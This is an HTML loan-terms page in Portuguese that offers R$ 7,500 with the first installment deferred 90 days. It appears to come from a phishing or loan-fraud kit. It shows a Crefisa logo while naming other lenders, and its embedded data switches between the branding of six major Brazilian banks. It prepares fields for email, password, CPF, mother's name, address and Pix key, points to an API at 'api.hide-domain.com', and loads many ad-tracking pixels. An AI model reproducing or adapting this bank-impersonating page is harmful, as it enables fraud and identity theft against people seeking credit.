<html data-capo="" style="--primary: #FE0064;"><head>
<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script async="" src="js/fbevents.js"></script><script>
  window.pixelId = "671cca42c3bdfd00ce38903f";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
<script src="js/latest.js" async="" defer=""></script>
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '894180486106015');
  fbq('track', 'PageView');
</script>
<noscript>
  <img height="1" width="1" style="display:none" 
       src="https://www.facebook.com/tr?id=894180486106015&ev=PageView&noscript=1"/>
</noscript>
<script>
  window.pixelId = "6716c4ab73dc126a95cede78";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '1048227396862250');
  fbq('track', 'PageView');
</script>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Empréstimo facilitado, simulação gratuita!</title>
  <style>
    /*! modern-normalize v2.0.0 | MIT License | https://github.com/sindresorhus/modern-normalize */
    *,
    :after,
    :before {
      box-sizing: border-box
    }

    html {
      font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
      line-height: 1.15;
      -webkit-text-size-adjust: 100%;
      -moz-tab-size: 4;
      -o-tab-size: 4;
      tab-size: 4
    }

    body {
      margin: 0
    }

    hr {
      color: inherit;
      height: 0
    }

    abbr[title] {
      -webkit-text-decoration: underline dotted;
      text-decoration: underline dotted
    }

    b,
    strong {
      font-weight: bolder
    }

    code,
    kbd,
    pre,
    samp {
      font-family: ui-monospace, SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
      font-size: 1em
    }

    small {
      font-size: 80%
    }

    sub,
    sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: baseline
    }

    sub {
      bottom: -.25em
    }

    sup {
      top: -.5em
    }

    table {
      border-color: inherit;
      text-indent: 0
    }

    button,
    input,
    optgroup,
    select,
    textarea {
      font-family: inherit;
      font-size: 100%;
      line-height: 1.15;
      margin: 0
    }

    button,
    select {
      text-transform: none
    }

    [type=button],
    [type=reset],
    [type=submit],
    button {
      -webkit-appearance: button
    }

    ::-moz-focus-inner {
      border-style: none;
      padding: 0
    }

    :-moz-focusring {
      outline: 1px dotted ButtonText
    }

    :-moz-ui-invalid {
      box-shadow: none
    }

    legend {
      padding: 0
    }

    progress {
      vertical-align: baseline
    }

    ::-webkit-inner-spin-button,
    ::-webkit-outer-spin-button {
      height: auto
    }

    [type=search] {
      -webkit-appearance: textfield;
      outline-offset: -2px
    }

    ::-webkit-search-decoration {
      -webkit-appearance: none
    }

    ::-webkit-file-upload-button {
      -webkit-appearance: button;
      font: inherit
    }

    summary {
      display: list-item
    }
  </style>
  <style>
    blockquote,
    dd,
    dl,
    figure,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    hr,
    ol,
    p,
    pre,
    ul {
      margin: 0
    }

    ol,
    ul {
      list-style: none;
      padding: 0
    }

    img,
    video {
      height: auto;
      max-width: 100%
    }

    *,
    :after,
    :before {
      border: 0 solid #000
    }

    :root {
      --primary: transparent;
      --red: #ef4444;
      --green: #27ae60
    }

    body {
      background-color: #fff;
      color: #000;
      font-size: 16px
    }

    #__nuxt,
    body,
    html {
      height: 100%
    }

    a {
      color: #1b98e0;
      text-decoration: none
    }

    a:hover {
      cursor: pointer;
      text-decoration: underline
    }

    .text-red {
      color: var(--red)
    }

    .text-green {
      color: var(--green)
    }

    .text-primary {
      color: var(--primary)
    }

    h2 {
      font-weight: 500
    }
  </style>
  <style>
    .default-layout[data-v-77968890] {
      display: grid;
      grid-template-areas: "top-bar" "content" "footer";
      grid-template-rows: auto 1fr auto;
      min-height: 100vh
    }

    .default-layout .top-bar[data-v-77968890] {
      grid-area: top-bar
    }

    .default-layout .content[data-v-77968890] {
      background-color: #f5f7f9;
      grid-area: content
    }

    .default-layout .footer[data-v-77968890] {
      grid-area: footer
    }
  </style>
  <style>
    .top-bar[data-v-f5d5d4cd] {
      background-color: var(--primary);
      border-bottom: 1px solid hsla(0, 0%, 100%, .3);
      width: 100%
    }

    .top-bar .container[data-v-f5d5d4cd] {
      display: grid;
      padding: 1.5rem 0;
      place-content: center
    }
  </style>
  <style>
    .container[data-v-0041013f] {
      box-sizing: border-box;
      margin: 0 auto;
      padding-left: 1rem;
      padding-right: 1rem
    }

    @media (min-width:640px) {
      .container[data-v-0041013f] {
        max-width: 90%
      }
    }

    @media (min-width:768px) {
      .container[data-v-0041013f] {
        max-width: 85%
      }
    }

    @media (min-width:1024px) {
      .container[data-v-0041013f] {
        max-width: 80%
      }
    }

    @media (min-width:1280px) {
      .container[data-v-0041013f] {
        max-width: 1000px
      }
    }
  </style>
  <style>
    img.logo[data-v-4f7075cc] {
      height: var(--2348ed9e);
      width: auto
    }

    h1.logo[data-v-4f7075cc] {
      color: #fff;
      text-shadow: 0 1px 2px rgba(0, 0, 0, .2)
    }
  </style>
  <style>
    .card[data-v-f9269b1b] {
      display: grid;
      gap: 1rem
    }

    .card .address-form[data-v-f9269b1b] {
      margin-top: 1rem
    }

    a[data-v-f9269b1b] {
      background: var(--primary);
      border-radius: 1rem;
      color: #fff;
      cursor: pointer;
      font-weight: 500;
      letter-spacing: .3px;
      padding: .75rem 3rem;
      transition: opacity .1s;
      width: -moz-max-content;
      width: max-content
    }
  </style>
  <style>
    .central-wrapper[data-v-4dac45b6] {
      margin: 2.5rem 0
    }

    .container[data-v-4dac45b6] {
      display: grid;
      gap: 1rem;
      max-width: 480px;
      place-items: center
    }
  </style>
  <style>
    .card[data-v-cca10726] {
      background-color: #fff;
      border-radius: 10px;
      box-shadow: 0 1px 4px 0 rgba(0, 8, 38, .04);
      padding: 1.5rem;
      width: 100%
    }
  </style>
  <style>
    .card-title[data-v-303a1430] {
      color: #000;
      font-size: 1.35rem;
      font-weight: 500
    }
  </style>
  <style>
    .card-sub-title[data-v-2901cb0a] {
      color: rgba(0, 0, 0, .5);
      line-height: 1.5
    }
  </style>
  <style>
    .footer[data-v-63f14862] {
      border-bottom: 7px solid var(--primary);
      border-top: 2px solid #edf0ef;
      color: #fff;
      color: #000;
      padding: 2rem 0;
      text-align: center
    }

    .footer p[data-v-63f14862] {
      margin: .5rem 0
    }
  </style>
  <link rel="stylesheet" href="/_nuxt/TopBar.2vF9lWx7.css">
  <link rel="stylesheet" href="/_nuxt/Container.B5PP9_Vn.css">
  <link rel="stylesheet" href="/_nuxt/CardTitle.D2C4NpE7.css">
  <link rel="stylesheet" href="/_nuxt/CardSubTitle.DG_Fs8af.css">
  <link rel="stylesheet" href="/_nuxt/Card.GBBMdh4F.css">
  <link rel="stylesheet" href="/_nuxt/CentralWrapper.Jxhi_ayc.css">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/Ds3y3Bf3.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/k9y74een.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/Bo8ipC1T.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/2aeojNjQ.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/Coyod-Dc.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/DTnGPJep.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/B1xLFNhR.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/sv4npInL.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/BxXuEPsU.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/MaghENf1.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/BJRZzHYv.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/CV182wBC.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/J9e3dA3M.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/D-UNq_Tu.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/BGBp0rdz.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/Wpn3EkJ-.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/CKC6fHHG.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/BhOEMyyX.js">
  <script type="text/javascript" async="" src="js/events_3.js"></script>
  <script type="text/javascript" async="" src="js/events_2_1.js"></script>
  <script type="text/javascript" async="" src="js/events_1_1.js"></script>
  <script async="" src="js/fbevents_1.js"></script>
  <script src="1763225554485563-1.html" async=""></script>
  <script src="485377260925980-1.html" async=""></script>
  <script src="378830935268765-1.html" async=""></script>
  <script src="1241138923470476-1.html" async=""></script>
  <script async="" src="js/fbevents_1.js"></script>
  <script type="module" src="/_nuxt/Ds3y3Bf3.js" crossorigin=""></script>
  <script id="unhead:payload" type="application/json">{"title":"Empréstimo facilitado, simulação gratuita!"}</script>
  <script src="js/latest_1.js" async="" defer=""></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/11-terms.CC0FiJs6.css">
  <script async="" defer="" src="js/pixel_1.js"></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/default.fxhPcPvK.css"> <!-- Meta Pixel Code -->
  <script>
    !function (f, b, e, v, n, t, s) {
      if (f.fbq) return; n = f.fbq = function () {
        n.callMethod ?
        n.callMethod.apply(n, arguments) : n.queue.push(arguments)
      };
      if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
      n.queue = []; t = b.createElement(e); t.async = !0;
      t.src = v; s = b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t, s)
    }(window, document, 'script',
      'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1044109920185725');
    fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
      src="../tr-34?id=1044109920185725&ev=PageView&noscript=1"></noscript>
  <!-- End Meta Pixel Code -->

  <!-- Meta Pixel Code -->
  <script>
    !function (f, b, e, v, n, t, s) {
      if (f.fbq) return; n = f.fbq = function () {
        n.callMethod ?
        n.callMethod.apply(n, arguments) : n.queue.push(arguments)
      };
      if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
      n.queue = []; t = b.createElement(e); t.async = !0;
      t.src = v; s = b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t, s)
    }(window, document, 'script',
      'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1416081155754349');
    fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
      src="../tr-35?id=1416081155754349&ev=PageView&noscript=1"></noscript>
  <!-- End Meta Pixel Code -->

  <!-- Meta Pixel Code -->
  <script>
    !function (f, b, e, v, n, t, s) {
      if (f.fbq) return; n = f.fbq = function () {
        n.callMethod ?
        n.callMethod.apply(n, arguments) : n.queue.push(arguments)
      };
      if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
      n.queue = []; t = b.createElement(e); t.async = !0;
      t.src = v; s = b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t, s)
    }(window, document, 'script',
      'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '478917228479685');
    fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
      src="../tr-36?id=478917228479685&ev=PageView&noscript=1"></noscript>
  <!-- End Meta Pixel Code -->

  <!-- TikTok Pixel Code Start -->
  <script>
    !function (w, d, t) {
      w.TiktokAnalyticsObject = t; var ttq = w[t] = w[t] || []; ttq.methods = ["page", "track", "identify", "instances", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie", "holdConsent", "revokeConsent", "grantConsent"], ttq.setAndDefer = function (t, e) { t[e] = function () { t.push([e].concat(Array.prototype.slice.call(arguments, 0))) } }; for (var i = 0; i < ttq.methods.length; i++)ttq.setAndDefer(ttq, ttq.methods[i]); ttq.instance = function (t) {
        for (
          var e = ttq._i[t] || [], n = 0; n < ttq.methods.length; n++)ttq.setAndDefer(e, ttq.methods[n]); return e
      }, ttq.load = function (e, n) {
        var r = "https://analytics.tiktok.com/i18n/pixel/events.js", o = n && n.partner; ttq._i = ttq._i || {}, ttq._i[e] = [], ttq._i[e]._u = r, ttq._t = ttq._t || {}, ttq._t[e] = +new Date, ttq._o = ttq._o || {}, ttq._o[e] = n || {}; n = document.createElement("script")
          ; n.type = "text/javascript", n.async = !0, n.src = r + "?sdkid=" + e + "&lib=" + t; e = document.getElementsByTagName("script")[0]; e.parentNode.insertBefore(n, e)
      };


      ttq.load('CR88BSBC77U42T4DV7H0');
      ttq.page();
    }(window, document, 'ttq');
  </script>
  <!-- TikTok Pixel Code End -->

  <script>
    !function (e, t) { "object" == typeof exports && "object" == typeof module ? module.exports = t() : "function" == typeof define && define.amd ? define([], t) : "object" == typeof exports ? exports.install = t() : e.install = t() }(window, (function () { return function (e) { var t = {}; function n(o) { if (t[o]) return t[o].exports; var r = t[o] = { i: o, l: !1, exports: {} }; return e[o].call(r.exports, r, r.exports, n), r.l = !0, r.exports } return n.m = e, n.c = t, n.d = function (e, t, o) { n.o(e, t) || Object.defineProperty(e, t, { enumerable: !0, get: o }) }, n.r = function (e) { "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 }) }, n.t = function (e, t) { if (1 & t && (e = n(e)), 8 & t) return e; if (4 & t && "object" == typeof e && e && e.__esModule) return e; var o = Object.create(null); if (n.r(o), Object.defineProperty(o, "default", { enumerable: !0, value: e }), 2 & t && "string" != typeof e) for (var r in e) n.d(o, r, function (t) { return e[t] }.bind(null, r)); return o }, n.n = function (e) { var t = e && e.__esModule ? function () { return e.default } : function () { return e }; return n.d(t, "a", t), t }, n.o = function (e, t) { return Object.prototype.hasOwnProperty.call(e, t) }, n.p = "", n(n.s = 0) }([function (e, t, n) { "use strict"; var o = this && this.__spreadArray || function (e, t, n) { if (n || 2 === arguments.length) for (var o, r = 0, i = t.length; r < i; r++)!o && r in t || (o || (o = Array.prototype.slice.call(t, 0, r)), o[r] = t[r]); return e.concat(o || Array.prototype.slice.call(t)) }; Object.defineProperty(t, "__esModule", { value: !0 }); var r = function (e, t, n) { var o, i = e.createElement("script"); i.type = "text/javascript", i.async = !0, i.src = t, n && (i.onerror = function () { r(e, n) }); var a = e.getElementsByTagName("script")[0]; null === (o = a.parentNode) || void 0 === o || o.insertBefore(i, a) }; !function (e, t, n) { e.KwaiAnalyticsObject = n; var i = e[n] = e[n] || []; i.methods = ["page", "track", "identify", "instances", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie"]; var a = function (e, t) { e[t] = function () { for (var n = [], r = 0; r < arguments.length; r++)n[r] = arguments[r]; var i = o([t], n, !0); e.push(i) } }; i.methods.forEach((function (e) { a(i, e) })), i.instance = function (e) { var t, n = (null === (t = i._i) || void 0 === t ? void 0 : t[e]) || []; return i.methods.forEach((function (e) { a(n, e) })), n }, i.load = function (e, o) { var a = "https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js"; i._i = i._i || {}, i._i[e] = [], i._i[e]._u = a, i._t = i._t || {}, i._t[e] = +new Date, i._o = i._o || {}, i._o[e] = o || {}; var c = "?sdkid=".concat(e, "&lib=").concat(n); r(t, a + c, "https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js" + c) } }(window, document, "kwaiq") }]) }));
  </script>
  <script>
    kwaiq.load('510449167530721283');
    kwaiq.page();
  </script>
<script async="" defer="" src="js/pixel.js"></script></head>

<body>
  <div id="__nuxt">
    <div class="default-layout" data-v-77968890="">
      <style>
        .top-bar {
          background-color: white;
          border-bottom: 1px solid hsla(0, 0%, 100%, .3);
          width: 100%;
        }

        .top-bar .container {
          display: grid;
          padding: 1.5rem 0;
          place-content: center;
        }
      </style>
      <header class="top-bar">
        <div class="container">
          <h1 class="logo" data-v-f5d5d4cd="" style="--2348ed9e: 10px; color: white;" data-v-4f7075cc=""><img src="images/Crefisa.png" style="max-width:100px"></h1>
        </div>
      </header>
      <main class="content" data-v-77968890=""><!--[-->
        <div class="central-wrapper address-page" data-v-f9269b1b="" data-v-4dac45b6="">
          <div class="container" data-v-4dac45b6="" data-v-0041013f=""><!--[--><!--[-->
            <div class="card" data-v-f9269b1b="" data-v-cca10726=""><!--[--><span class="card-title" data-v-f9269b1b="" data-v-303a1430=""><!--[-->Termos do empréstimo<!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> Por este instrumento, o cliente <b data-v-f9269b1b=""></b> e a empresa <b data-v-f9269b1b="">SIM (Aymoré Crédito, Financiamento e Investimento S.A.),</b> firmam o presente termo de
                empréstimo, segundo as condições a seguir: <!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> O cliente solicita um empréstimo no valor total de R$
                7.500,00 com pagamento da primeira parcela somente 90 dias após a contratação<b data-v-f9269b1b=""></b>
                <b data-v-f9269b1b=""></b> <b data-v-f9269b1b=""></b>. <!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> Ambas as partes concordam com os valores e condições
                estipulados neste termo. Este termo visa assegurar que tanto você quanto Aymoré Crédito, Financiamento e Investimento S.A. tenham clareza sobre o
                que foi acordado, garantindo uma relação transparente e confiável. <!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> Cordialmente,<br data-v-f9269b1b=""> Aymoré Crédito, Financiamento e Investimento S.A.<!--]--></span><!--]--></div><a href="/gerente" style="opacity: 1;" data-v-f9269b1b="">Li e aceito os termos</a><!--]--><!--]-->
          </div>
        </div><!--]-->
      </main>
      <footer class="footer" data-v-77968890="" data-v-63f14862="">
        <div class="container" data-v-63f14862="" data-v-0041013f=""><!--[-->
          <p data-v-63f14862="">© 2024 Sim, Crédito Simples</p>
          <p data-v-63f14862="">Amador Bueno, nº474. Bloco C. 1º andar - Santo Amaro, São Paulo - SP, CEP 04752-901.</p><!--]-->
        </div>
      </footer>
    </div>
  </div>
  <div id="teleports"></div>
  <script type="application/json" id="__NUXT_DATA__" data-ssr="true">[["ShallowReactive",1],{"data":2,"state":4,"once":6,"_errors":7,"serverRendered":9,"path":10,"pinia":11},["ShallowReactive",3],{},["Reactive",5],{},["Set"],["ShallowReactive",8],{},true,"/uni/11-terms",["Reactive",12],{"brand":13,"user":70,"card-user":79},{"brandSlug":14,"brands":15},"uni",[16,25,34,43,52,61],{"slug":17,"name":18,"logo":19,"cnpj":22,"address":23,"color":24},"bb","Banco do Brasil",{"normal":20,"light":21},"/brands/bb.svg","/brands/light/bb.svg","00.000.000/0001-91","Asa Norte, S/Nº, Brasília/DF - CEP 70040-911","#e1ae2f",{"slug":26,"name":27,"logo":28,"cnpj":31,"address":32,"color":33},"bc","Bradesco",{"normal":29,"light":30},"/brands/bradesco.svg","/brands/light/bradesco.svg","60.746.948.0001-12","Cidade De Deus, S/Nº, Osasco/SP - CEP 06029-900","#E1173F",{"slug":35,"name":36,"logo":37,"cnpj":40,"address":41,"color":42},"it","Itaú",{"normal":38,"light":39},"/brands/itau.svg","/brands/light/itau.svg","60.872.504/0001-23","Praça Alfredo Egydio de Souza Aranha, 100,  Parque Jabaquara/SP - CEP 04344-902","#FF6200",{"slug":44,"name":45,"logo":46,"cnpj":49,"address":50,"color":51},"std","Santander",{"normal":47,"light":48},"/brands/santander.svg","/brands/light/santander.svg","90.400.888/0001-42","Av. Presidente Juscelino Kubitscheck, 2041/2235, São Paulo/SP - CEP 13571-410","#cc0000",{"slug":53,"name":54,"logo":55,"cnpj":58,"address":59,"color":60},"cef","Caixa",{"normal":56,"light":57},"/brands/caixa.svg","/brands/light/caixa.svg","00.360.305/0001-04","Asa Sul, S/Nº, Brasília/DF - CEP 70070-140","#0066b3",{"slug":62,"name":63,"logo":64,"cnpj":67,"address":68,"color":69},"pag","PagBank",{"normal":65,"light":66},"/brands/pagbank.svg","/brands/light/pagbank.svg","08.561.701/0001-01","Av. Brigadeiro Faria Lima, 1.384, São Paulo/SP - CEP 01451-001","#1bb99a",{"publicId":71,"credential":72,"address":74,"personalInfo":75,"loan":76},"",{"email":71,"password":71,"hasFacebook":73},false,{"street":71,"number":-1,"complement":-1,"neighborhood":71,"city":71,"state":71,"zipCode":71},{"fullName":71,"cpf":71,"birthDate":71,"phone":71,"motherName":71,"gender":71,"firstName":71,"lastName":71},{"desiredValue":77,"installmentCount":77,"income":77,"occupation":71,"loanReason":71,"educationLevel":71,"salaryDay":77,"pixKey":71,"pixBank":71,"primaryPayment":77,"secondaryPayment":77,"currencyFormat":78},0,{"desiredValue":71,"income":71,"primaryPayment":71,"secondaryPayment":71},{"fullName":71,"birthDate":71,"cpf":71,"motherName":71,"street":71,"number":71,"complement":71,"neighborhood":71,"city":71,"state":71,"zipCode":71,"shipping":71}]</script>
  <script>window.__NUXT__ = {}; window.__NUXT__.config = { public: { apiBase: "https://api.hide-domain.com", adminId: 1, projectId: 1 }, app: { baseURL: "/", buildId: "f7f5e04f-036f-410e-b85c-b41773d9e483", buildAssetsDir: "/_nuxt/", cdnURL: "" } }</script>
<script>
  window.pixelId = "6716c4ab73dc126a95cede78";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>